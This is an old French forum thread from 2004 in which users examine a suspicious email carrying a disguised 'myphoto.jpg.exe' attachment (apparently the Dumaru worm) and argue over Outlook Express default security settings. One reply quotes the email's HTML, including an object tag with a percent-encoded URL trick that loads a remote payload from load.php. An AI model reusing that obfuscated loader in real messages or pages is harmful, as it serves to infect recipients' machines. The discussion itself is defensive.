mail bizare, spam ou virus?

104 réponses

yann63

25/01/2004 à 15:30

'jour

je viens de recevoir un mail bizare, accompagné d'un fichier .zip, a
l'interrieur un fichier myphoto.jpg.exe (oui double extention)

c'est un virus ou un spam avec un dialer a la con?

merci

au fait voici les header:
Return-Path: <address@yandex.ru>
Received: from mx0.grolier.fr (relay.grolier.fr [194.158.96.33])
by netc-3v.grolier.fr (Postfix) with ESMTP id 31104120A2
for <yann-internet@netcourrier.com>; Sun, 25 Jan 2004 11:38:48
+0100 (CET)
Received: from localhost (ALyon-110-1-27-252.w81-51.abo.wanadoo.fr
[81.51.211.252])
by mx0.grolier.fr (Postfix) with ESMTP id 1BC74C506
for <yann-internet@netcourrier.com>; Sun, 25 Jan 2004 11:38:47
+0100 (CET)
From: "Elene" <FUCKENSUICIDE@HOTMAIL.COM>
To: <yann-internet@netcourrier.com>
Subject: Important information for you. Read it immediately !
MIME-Version: 1.0
Content-Type: multipart/mixed;boundary="xxxx"
Message-Id: <20040125103847.1BC74C506@mx0.grolier.fr>
Date: Sun, 25 Jan 2004 11:38:47 +0100 (CET)
Status:
X-Mmail: \Recent
X-M-Uid: 316.1075027128

--
Ceci est une signature automatique de MesNews.
Site : http://arnaud.mesnews.free.fr/

10 réponses

1 2 3 4 5

Jacques Belin

25/01/2004 à 20:53

Le Sun, 25 Jan 2004 19:56:09 +0100
"Ewa (siostra Ani) N." a écrit:

J'en suis à mon 24e. Mon premier date d'hier, 9h 27 et vient d'une
machine polonaise.

A propos, d'après trendmicro
( http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_DUMARU.Y&VSect=S )
c'est la France qui est la plus touchée.
A l'heure où j'envoie ce message : 112 pour la France, 9 pour le
deuxième pays (USA)...

Dans le "propriétés" de l'exécutable
je vois qu'il a été créé le 10 novembre (mais je ne sais pas ce que ça
vaut comme information)

Même chose de mon côté..
Par contre, truc marrant dans la table du fichier zip, le fichier est
daté du 30/15/59 : 30e jour du quinzième moi de 59 (1959? 2059? ) ;-)

A+ Jacques.
--
Le dernier Homme connecté sur le Net regardait d'anciens sites Webs.
"Vous avez du courrier" apparut sur l'écran...
--------------------------- adapté d'une courte histoire de Fredric Brown

AMcD

25/01/2004 à 20:55

Heu personne peut me l'envoyer dans un zip+mot de passe ? j'aimerai bien y
jeter un oeil.

Merci.

--
AMcD

http://arnold.mcdonald.free.fr/
http://amcd.diablo.free.fr/

JacK

25/01/2004 à 20:55

sur les news:bv10ee$n43nd$,
Frederic Bezies signalait:

Le 25/01/2004 17:53, je ne dormais pas quand JacK nous a dit :

[...]

J'ai reçu la première version, mais utilisant Mozilla MailNews,
aucun problème pour la foutre à la poubelle :)

Qu'est-ce qu'un autre lecteur pourrait bien poser comme problème
pour le mettre à la poubelle ?

Simplement que la pièce jointe semble être auto-executable... Et quand
on laisse - 85% des cas - les options sans y toucher... ;)

'lut,

Quand on laisse les options sans y toucher dans OE, les pièces jointes
potentiellement dangereuses ne peuvent même pas être accédées ;)

De plus par défaut, OE est configuré sur Zone sites sensibles, d'où aucune
auto-exécution possible, ce depuis plus de deux ans.
--
JacK

Frederic Bezies

25/01/2004 à 20:58

Le 25/01/2004 20:55, je ne dormais pas quand JacK nous a dit :

sur les news:bv10ee$n43nd$,
Frederic Bezies signalait:

Le 25/01/2004 17:53, je ne dormais pas quand JacK nous a dit :

[...]

J'ai reçu la première version, mais utilisant Mozilla MailNews,
aucun problème pour la foutre à la poubelle :)

Qu'est-ce qu'un autre lecteur pourrait bien poser comme problème
pour le mettre à la poubelle ?

Simplement que la pièce jointe semble être auto-executable... Et quand
on laisse - 85% des cas - les options sans y toucher... ;)

'lut,

Quand on laisse les options sans y toucher dans OE, les pièces jointes
potentiellement dangereuses ne peuvent même pas être accédées ;)

Ah ? Il n'y a pas de bugs exploités qui permettent une élévation de
privilège et outre-passer les réglages ?

De plus par défaut, OE est configuré sur Zone sites sensibles, d'où aucune
auto-exécution possible, ce depuis plus de deux ans.

Mais - et cela est le problème - nombre de personnes sous 98Se ou Me (il
ne faut pas négliger cette base) utilisent encore une version 5.x, et
les XP Gold doivent faire partie de logiciels sensibles.

Comme tu dis deux ans, je pense que tu parles d'OE 6.0Sp1...

--
Frédéric Béziès -

Site Perso : http://frederic.bezies.free.fr/
Weblog : http://www.u-blog.net/fredb/
Fourre-tout : http://frederic.bezies.free.fr/pratique/

JacK

25/01/2004 à 21:19

sur les news:bv1791$n0c0u$,
Frederic Bezies signalait:

Le 25/01/2004 20:55, je ne dormais pas quand JacK nous a dit :

sur les news:bv10ee$n43nd$,
Frederic Bezies signalait:

Le 25/01/2004 17:53, je ne dormais pas quand JacK nous a dit :

[...]

J'ai reçu la première version, mais utilisant Mozilla MailNews,
aucun problème pour la foutre à la poubelle :)

Qu'est-ce qu'un autre lecteur pourrait bien poser comme problème
pour le mettre à la poubelle ?

Simplement que la pièce jointe semble être auto-executable... Et
quand on laisse - 85% des cas - les options sans y toucher... ;)

'lut,

Quand on laisse les options sans y toucher dans OE, les pièces
jointes potentiellement dangereuses ne peuvent même pas être
accédées ;)

Ah ? Il n'y a pas de bugs exploités qui permettent une élévation de
privilège et outre-passer les réglages ?
Explique-moi comment alors que dans le message ni activeX, ni VM, ni scripts

d'aucune sorte ne peuvent être exécutés dans la zone site sensible ;)
Sans compter que dans le cas présent, la pièce jointe est zippée, ce qui
exclut toute auto-exécution.

De plus par défaut, OE est configuré sur Zone sites sensibles, d'où
aucune auto-exécution possible, ce depuis plus de deux ans.

Mais - et cela est le problème - nombre de personnes sous 98Se ou Me
(il ne faut pas négliger cette base) utilisent encore une version
5.x, et les XP Gold doivent faire partie de logiciels sensibles.

Comme tu dis deux ans, je pense que tu parles d'OE 6.0Sp1...
Oui, de même que Mozilla a évolué, les autres logiciels également ;)

--
JacK

djehuti

25/01/2004 à 21:20

salut
"JacK" a écrit dans le message news:
bv16te$n8fe8$

Simplement que la pièce jointe semble être auto-executable... Et
quand on laisse - 85% des cas - les options sans y toucher... ;)

Quand on laisse les options sans y toucher dans OE, les pièces jointes
potentiellement dangereuses ne peuvent même pas être accédées ;)

De plus par défaut, OE est configuré sur Zone sites sensibles, d'où
aucune auto-exécution possible, ce depuis plus de deux ans.

y a quand même un p'tit truc pas net (et du hta dans l'air)

===== Content-Type: text/html;
Content-Transfer-Encoding: 7bit

<FONT color=red size><CENTER>Hi !</CENTER></FONT><BR>
Here is my photo, that you asked for yesterday.<BR><object
data=http://gold-hosting.com@%79o%75%61n%64menee%64%6co%76e.com/load.php
WIDTH=1 HEIGHT=1></iframe>

--xxxx
name="accounts.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="myphoto.zip"
=====
le site /youandmeneedlove.com/ étant déjà désactivé quand j'y ai jeté un
oeil :-(

@tchao

Frederic Bezies

25/01/2004 à 21:42

Le 25/01/2004 21:19, je ne dormais pas quand JacK nous a dit :

[...]

Ah ? Il n'y a pas de bugs exploités qui permettent une élévation de
privilège et outre-passer les réglages ?

Explique-moi comment alors que dans le message ni activeX, ni VM, ni scripts
d'aucune sorte ne peuvent être exécutés dans la zone site sensible ;)

Suffit de passer par un petit dépassement de tampon ? ;)

Sans compter que dans le cas présent, la pièce jointe est zippée, ce qui
exclut toute auto-exécution.

Juste histoire de ne pas être filtré par les serveurs qui niquent les
exe en pièce jointe.

[...]

Comme tu dis deux ans, je pense que tu parles d'OE 6.0Sp1...

Oui, de même que Mozilla a évolué, les autres logiciels également ;)

Simple remarque en deux points :

- version de WinXP proposé par les PCs en grande surface ?
- pourcentage des utilisateurs qui se maintiennent à jour ?

--
Frédéric Béziès -

Site Perso : http://frederic.bezies.free.fr/
Weblog : http://www.u-blog.net/fredb/
Fourre-tout : http://frederic.bezies.free.fr/pratique/

JacK

25/01/2004 à 21:53

sur les news:bv19oe$n2tui$,
Frederic Bezies signalait:

Le 25/01/2004 21:19, je ne dormais pas quand JacK nous a dit :

[...]

Ah ? Il n'y a pas de bugs exploités qui permettent une élévation de
privilège et outre-passer les réglages ?

Explique-moi comment alors que dans le message ni activeX, ni VM, ni
scripts d'aucune sorte ne peuvent être exécutés dans la zone site
sensible ;)

Suffit de passer par un petit dépassement de tampon ? ;)
J'aime bien le "suffit" dans ce cas-ci ;)

Sans compter que dans le cas présent, la pièce jointe est zippée, ce
qui exclut toute auto-exécution.

Juste histoire de ne pas être filtré par les serveurs qui niquent les
exe en pièce jointe.
Et donc, pas d'auto-exécution possible ici.

[...]

Comme tu dis deux ans, je pense que tu parles d'OE 6.0Sp1...

Oui, de même que Mozilla a évolué, les autres logiciels également ;)

Simple remarque en deux points :

- version de WinXP proposé par les PCs en grande surface ?
J'en sais rien : me viendrait pas à l'idée d'acheter un PC dans une grande

surface.
De toute façon, dès qu'ils se connecteront, si pas à jour, la faille RPC se
chargera de leur rappeler de le faire rapidement :o)

- pourcentage des utilisateurs qui se maintiennent à jour ?
S'ils ne le font, c'est leur problème : par défaut les PC (même achetés en

grande surface) le font automatiquement.
Pourcentage des utilisateurs utilisant un logiciel de courrier et/ou un
browser alternatif ?
Les solutions sont disponibles, elles sont là pour être utilisées.
--
@+ JacK

Frederic Bezies

25/01/2004 à 21:59

Le 25/01/2004 21:53, je ne dormais pas quand JacK nous a dit :

[...]

Suffit de passer par un petit dépassement de tampon ? ;)

J'aime bien le "suffit" dans ce cas-ci ;)

C'est le principe de base de nombreuses failles utilisées.

Sans compter que dans le cas présent, la pièce jointe est zippée, ce
qui exclut toute auto-exécution.

Juste histoire de ne pas être filtré par les serveurs qui niquent les
exe en pièce jointe.

Et donc, pas d'auto-exécution possible ici.

Mouais. Cependant, il y aura toujours des personnes un peu trop
curieuses... :[

[...]

- version de WinXP proposé par les PCs en grande surface ?

J'en sais rien : me viendrait pas à l'idée d'acheter un PC dans une grande
surface.

:o)

Mais c'est souvent le lieu d'un primo-équipement.

De toute façon, dès qu'ils se connecteront, si pas à jour, la faille RPC se
chargera de leur rappeler de le faire rapidement :o)

En effet :)

- pourcentage des utilisateurs qui se maintiennent à jour ?

S'ils ne le font, c'est leur problème : par défaut les PC (même achetés en
grande surface) le font automatiquement.

Tu es sûr que l'activation est faite pour les mises à jour en automatique ?

Pourcentage des utilisateurs utilisant un logiciel de courrier et/ou un
browser alternatif ?

Car ils ne s'informent pas.

Les solutions sont disponibles, elles sont là pour être utilisées.

Quand tu ignores qu'elles existent...

--
Frédéric Béziès -

Site Perso : http://frederic.bezies.free.fr/
Weblog : http://www.u-blog.net/fredb/
Fourre-tout : http://frederic.bezies.free.fr/pratique/

JacK

25/01/2004 à 23:05

On Sunday, January 25, 2004 9:59 PM [GMT+1ÎT],
Frederic Bezies écrivait:

Le 25/01/2004 21:53, je ne dormais pas quand JacK nous a dit :

[...]

Suffit de passer par un petit dépassement de tampon ? ;)

J'aime bien le "suffit" dans ce cas-ci ;)

C'est le principe de base de nombreuses failles utilisées.
Oui mais concerne principalement IE depuis la zone Internet, OE est sur la

Zone Site par défaut sensibles donc sans scripts, java, Iframe, etc...
permettant d'exploiter les vulnérabilités.

Sans compter que dans le cas présent, la pièce jointe est zippée,
ce qui exclut toute auto-exécution.

Juste histoire de ne pas être filtré par les serveurs qui niquent
les exe en pièce jointe.

Et donc, pas d'auto-exécution possible ici.

Mouais. Cependant, il y aura toujours des personnes un peu trop
curieuses... :[
Qui auront exactement le même problème quel que soit le logiciel de courrier

utilisé avec les pièces jointes qu'il décideront d'exécuter.

[...]

- version de WinXP proposé par les PCs en grande surface ?

J'en sais rien : me viendrait pas à l'idée d'acheter un PC dans une
grande surface.

o)

Mais c'est souvent le lieu d'un primo-équipement.

De toute façon, dès qu'ils se connecteront, si pas à jour, la faille
RPC se chargera de leur rappeler de le faire rapidement :o)

En effet :)

- pourcentage des utilisateurs qui se maintiennent à jour ?

S'ils ne le font, c'est leur problème : par défaut les PC (même
achetés en grande surface) le font automatiquement.

Tu es sûr que l'activation est faite pour les mises à jour en
automatique ?
Oui

Pourcentage des utilisateurs utilisant un logiciel de courrier et/ou
un browser alternatif ?

Car ils ne s'informent pas.
Le principal problème : l'information et la formation.

Pas demain la veille que ça changera....

Les solutions sont disponibles, elles sont là pour être utilisées.

Quand tu ignores qu'elles existent...
Pas demain la veille que ça changera non plus : ils ne connaissent déjà pas

ce qu'il y a d'installé sur le poste, alors pour ce qui n'y est pas...

--
JacK

On Sunday, January 25, 2004 9:59 PM [GMT+1ÎT],
Frederic Bezies <mozjf@alussinan.org> écrivait:

Le 25/01/2004 21:53, je ne dormais pas quand JacK nous a dit :

[...]

Suffit de passer par un petit dépassement de tampon ? ;)

J'aime bien le "suffit" dans ce cas-ci ;)

C'est le principe de base de nombreuses failles utilisées.
Oui mais concerne principalement IE depuis la zone Internet, OE est sur la

Zone Site par défaut sensibles donc sans scripts, java, Iframe, etc...
permettant d'exploiter les vulnérabilités.

Sans compter que dans le cas présent, la pièce jointe est zippée,
ce qui exclut toute auto-exécution.

Juste histoire de ne pas être filtré par les serveurs qui niquent
les exe en pièce jointe.

Et donc, pas d'auto-exécution possible ici.

Mouais. Cependant, il y aura toujours des personnes un peu trop
curieuses... :[
Qui auront exactement le même problème quel que soit le logiciel de courrier

utilisé avec les pièces jointes qu'il décideront d'exécuter.

[...]

- version de WinXP proposé par les PCs en grande surface ?

J'en sais rien : me viendrait pas à l'idée d'acheter un PC dans une
grande surface.

o)

Mais c'est souvent le lieu d'un primo-équipement.

De toute façon, dès qu'ils se connecteront, si pas à jour, la faille
RPC se chargera de leur rappeler de le faire rapidement :o)

En effet :)

- pourcentage des utilisateurs qui se maintiennent à jour ?

S'ils ne le font, c'est leur problème : par défaut les PC (même
achetés en grande surface) le font automatiquement.

Tu es sûr que l'activation est faite pour les mises à jour en
automatique ?
Oui

Pourcentage des utilisateurs utilisant un logiciel de courrier et/ou
un browser alternatif ?

Car ils ne s'informent pas.
Le principal problème : l'information et la formation.

Pas demain la veille que ça changera....

Les solutions sont disponibles, elles sont là pour être utilisées.

Quand tu ignores qu'elles existent...
Pas demain la veille que ça changera non plus : ils ne connaissent déjà pas

ce qu'il y a d'installé sur le poste, alors pour ce qui n'y est pas...

--
JacK

Vous avez filtré cet utilisateur ! Consultez son message

On Sunday, January 25, 2004 9:59 PM [GMT+1ÎT],
Frederic Bezies écrivait:

Le 25/01/2004 21:53, je ne dormais pas quand JacK nous a dit :

[...]

Suffit de passer par un petit dépassement de tampon ? ;)

J'aime bien le "suffit" dans ce cas-ci ;)

C'est le principe de base de nombreuses failles utilisées.
Oui mais concerne principalement IE depuis la zone Internet, OE est sur la

Zone Site par défaut sensibles donc sans scripts, java, Iframe, etc...
permettant d'exploiter les vulnérabilités.

Sans compter que dans le cas présent, la pièce jointe est zippée,
ce qui exclut toute auto-exécution.

Juste histoire de ne pas être filtré par les serveurs qui niquent
les exe en pièce jointe.

Et donc, pas d'auto-exécution possible ici.

Mouais. Cependant, il y aura toujours des personnes un peu trop
curieuses... :[
Qui auront exactement le même problème quel que soit le logiciel de courrier

utilisé avec les pièces jointes qu'il décideront d'exécuter.

[...]

- version de WinXP proposé par les PCs en grande surface ?

J'en sais rien : me viendrait pas à l'idée d'acheter un PC dans une
grande surface.

o)

Mais c'est souvent le lieu d'un primo-équipement.

De toute façon, dès qu'ils se connecteront, si pas à jour, la faille
RPC se chargera de leur rappeler de le faire rapidement :o)

En effet :)

- pourcentage des utilisateurs qui se maintiennent à jour ?

S'ils ne le font, c'est leur problème : par défaut les PC (même
achetés en grande surface) le font automatiquement.

Tu es sûr que l'activation est faite pour les mises à jour en
automatique ?
Oui

Pourcentage des utilisateurs utilisant un logiciel de courrier et/ou
un browser alternatif ?

Car ils ne s'informent pas.
Le principal problème : l'information et la formation.

Pas demain la veille que ça changera....

Les solutions sont disponibles, elles sont là pour être utilisées.

Quand tu ignores qu'elles existent...
Pas demain la veille que ça changera non plus : ils ne connaissent déjà pas

ce qu'il y a d'installé sur le poste, alors pour ce qui n'y est pas...

--
JacK

1 2 3 4 5

mail bizare, spam ou virus?

10 réponses

Veuillez sélectionner un problème